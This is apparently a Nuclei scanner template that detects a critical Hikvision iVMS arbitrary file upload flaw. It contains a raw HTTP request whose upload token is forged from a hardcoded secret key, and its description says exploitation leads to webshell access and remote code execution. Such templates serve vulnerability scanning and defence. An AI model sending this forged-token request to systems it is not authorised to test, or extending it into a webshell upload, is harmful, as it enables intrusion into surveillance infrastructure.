http:
    - matchers:
        - condition: and
          dsl:
            - status_code_1 == 200 && contains(body_1,'errorMessage') && contains(body_1,'The current request is not a multipart request')
          type: dsl
      matchers-condition: and
      raw:
        - |
          POST /eps/api/resourceOperations/upload?token={{to_upper(md5(concat("{{RootURL}}","/eps/api/resourceOperations/uploadsecretKeyIbuilding")))}} HTTP/1.1
          Host: {{Hostname}}
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
          Accept-Encoding: gzip, deflate
          Accept-Language: zh-CN,zh;q=0.9
          Connection: close

          service={{url_encode(concat("{{RootURL}}","/home/index.action"))}}
id: hikvision-ivms-token-bypass-arbitrary-file-upload
info:
    author: SleepingBag945
    description: 海康威视iVMS综合安防系统任意文件上传漏洞，攻击者通过获取密钥任意构造token，请求/resourceOperations/upload接口任意上传文件，导致获取服务器webshell权限，同时可远程进行恶意代码执行。
    name: hikvision-ivms-token-bypass-arbitrary-file-upload
    reference:
        - https://blog.csdn.net/qq_41904294/article/details/130807691
    severity: critical
    tags:
        - hikvision
        - ivms
        - 海康威视ivms
        - HIKVISION-iVMS
        - Hikvision-iVMS
